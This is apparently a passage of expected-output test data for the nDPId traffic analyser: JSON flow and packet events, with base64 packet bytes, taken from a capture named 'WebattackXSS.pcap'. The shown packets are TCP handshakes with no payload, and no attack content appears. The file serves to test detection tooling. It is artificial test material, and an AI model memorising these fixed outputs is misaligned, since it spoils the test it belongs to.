-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347850209,"flow_last_seen":1499347855859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33350,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347850209,"flow_last_seen":1499347855859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347851476,"flow_last_seen":1499347856859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33364,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347851476,"flow_last_seen":1499347856859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33364,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347852742,"flow_last_seen":1499347857860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33378,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347852742,"flow_last_seen":1499347857860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33378,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347979251,"flow_last_seen":1499347979251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347979251,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":1,"flow_last_seen":1499347979251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347979251,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8naJAAD4GKC6sEAABwKgKMoeIAFCOM15oAAAAAKACchAliQAAAgQFtAQCCAoBPMPKAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8389,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":2,"flow_last_seen":1499347979251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347979251,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh4iSkzqsjjNeaaAScSDAAwAAAgQFtAQCCAoD5pU+ATzDygEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8390,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":3,"flow_last_seen":1499347979252,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347979252,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0naNAAD4GKDWsEAABwKgKMoeIAFCOM15pkpM6rYAQAOVfCwAAAQEICgE8w8oD5pU+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347980524,"flow_last_seen":1499347980524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347980524,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":1,"flow_last_seen":1499347980524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347980524,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eP5AAD4GTNKsEAABwKgKMoeWAFDY8732AAAAAKACchB57gAAAgQFtAQCCAoBPMUIAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8401,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":2,"flow_last_seen":1499347980524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347980524,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh5YkRgUi2PO996AScSC3AgAAAgQFtAQCCAoD5pZ8ATzFCAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8402,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":3,"flow_last_seen":1499347980525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347980525,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eP9AAD4GTNmsEAABwKgKMoeWAFDY8733JEYFI4AQAOVWCgAAAQEICgE8xQgD5pZ8"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8412,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347981782,"flow_last_seen":1499347981782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347981782,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8412,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":1,"flow_last_seen":1499347981782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347981782,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XEpAAD4GaYasEAABwKgKMoekAFBFSZoIAAAAAKACchAwPwAAAgQFtAQCCAoBPMZCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8413,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":2,"flow_last_seen":1499347981782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347981782,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh6RlAFMiRUmaCaAScSDdXQAAAgQFtAQCCAoD5pe3ATzGQgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":3,"flow_last_seen":1499347981783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347981783,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XEtAAD4GaY2sEAABwKgKMoekAFBFSZoJZQBTI4AQAOV8ZAAAAQEICgE8xkMD5pe3"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347983061,"flow_last_seen":1499347983061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347983061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":1,"flow_last_seen":1499347983061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347983061,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HjdAAD4Gp5msEAABwKgKMoeyAFDTp9m1AAAAAKACchBg5QAAAgQFtAQCCAoBPMeCAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":2,"flow_last_seen":1499347983061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347983061,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh7KKfm1X06fZtqAScSDNEQAAAgQFtAQCCAoD5pj2ATzHggEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":3,"flow_last_seen":1499347983062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347983062,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HjhAAD4Gp6CsEAABwKgKMoeyAFDTp9m2in5tWIAQAOVsGQAAAQEICgE8x4ID5pj2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347984370,"flow_last_seen":1499347984370,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347984370,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":1,"flow_last_seen":1499347984370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347984370,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81w5AAD4G7sGsEAABwKgKMofAAFB4CR\/HAAAAAKACchB1HQAAAgQFtAQCCAoBPMjJAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":2,"flow_last_seen":1499347984370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347984370,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh8AzI3sOeAkfyKAScSAppgAAAgQFtAQCCAoD5po+ATzIyQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":3,"flow_last_seen":1499347984371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347984371,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01w9AAD4G7sisEAABwKgKMofAAFB4CR\/IMyN7D4AQAOXIrAAAAQEICgE8yMoD5po+"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8445,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347985686,"flow_last_seen":1499347985686,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347985686,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8445,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":1,"flow_last_seen":1499347985686,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347985686,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UVJAAD4GdH6sEAABwKgKMofOAFAxwJtBAAAAAKACchA+lAAAAgQFtAQCCAoBPMoTAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8446,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":2,"flow_last_seen":1499347985687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347985687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh84CN1TUMcCbQqAScSBI+gAAAgQFtAQCCAoD5puHATzKEwEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8447,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":3,"flow_last_seen":1499347985687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347985687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UVNAAD4GdIWsEAABwKgKMofOAFAxwJtCAjdU1YAQAOXoAQAAAQEICgE8yhMD5puH"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347988233,"flow_last_seen":1499347988233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988233,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":1,"flow_last_seen":1499347988233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347988233,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aCNAAD4GXa2sEAABwKgKMofoAFBt56SsAAAAAKACchD2awAAAgQFtAQCCAoBPMyPAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":2,"flow_last_seen":1499347988233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347988233,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh+gH+IEYbeekraAScSDMUAAAAgQFtAQCCAoD5p4DATzMjwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8468,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":3,"flow_last_seen":1499347988234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347988234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aCRAAD4GXbSsEAABwKgKMofoAFBt56StB\/iBGYAQAOVrWAAAAQEICgE8zI8D5p4D"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347855324,"flow_last_seen":1499347860860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33404,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347855324,"flow_last_seen":1499347860860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33404,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347856593,"flow_last_seen":1499347861860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33418,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347856593,"flow_last_seen":1499347861860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33418,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347859192,"flow_last_seen":1499347864861,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33444,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347859192,"flow_last_seen":1499347864861,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347860489,"flow_last_seen":1499347865862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33458,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347860489,"flow_last_seen":1499347865862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33458,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347861783,"flow_last_seen":1499347866863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33472,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347861783,"flow_last_seen":1499347866863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33472,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347863072,"flow_last_seen":1499347868864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33486,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347863072,"flow_last_seen":1499347868864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 